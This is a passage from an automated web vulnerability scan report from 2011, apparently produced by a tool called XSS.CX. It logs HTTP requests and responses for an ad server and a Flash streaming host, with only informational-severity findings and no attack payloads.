Path:   /st

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409 HTTP/1.1
Host: ads.bluelithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:27 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 02:36:27 GMT
Pragma: no-cache
Content-Length: 4577
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...

32.2. http://vod.l3.cms.performgroup.com:443/open/1  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vod.l3.cms.performgroup.com:443
Path:   /open/1

Request

POST /open/1 HTTP/1.1
User-Agent: Shockwave Flash
Host: vod.l3.cms.performgroup.com:443
Content-Length: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache

.

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 17
Server: FlashCom/3.5.6

CxVmaD8DbwFmxEZ0

Report generated by XSS.CX at Sun Sep 04 06:00:29 GMT-06:00 2011.